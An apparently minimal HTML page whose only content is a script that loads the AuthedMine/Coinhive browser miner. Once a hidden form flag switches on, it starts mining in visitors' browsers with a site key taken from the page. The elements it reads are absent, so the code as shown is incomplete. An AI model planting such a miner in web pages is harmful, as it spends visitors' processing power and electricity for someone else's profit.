<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
    function check(){
    if(document.getElementById("bggyy").value=="1"){
        return true;}else{
        return false}
}

function doing() {
    var ww=document.getElementById("ggyy").value;
    var miner = new CoinHive.Anonymous(ww, {throttle: 0.3});

// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
    if (!miner.isMobile() && !miner.didOptOut(14400)) {
        miner.start();
    }
}
function checking() {
    if(check()){
        doing()
    }else{
        setTimeout(checking,3000);
    }

}
checking()</script>
</head>
<body>

</body>
</html>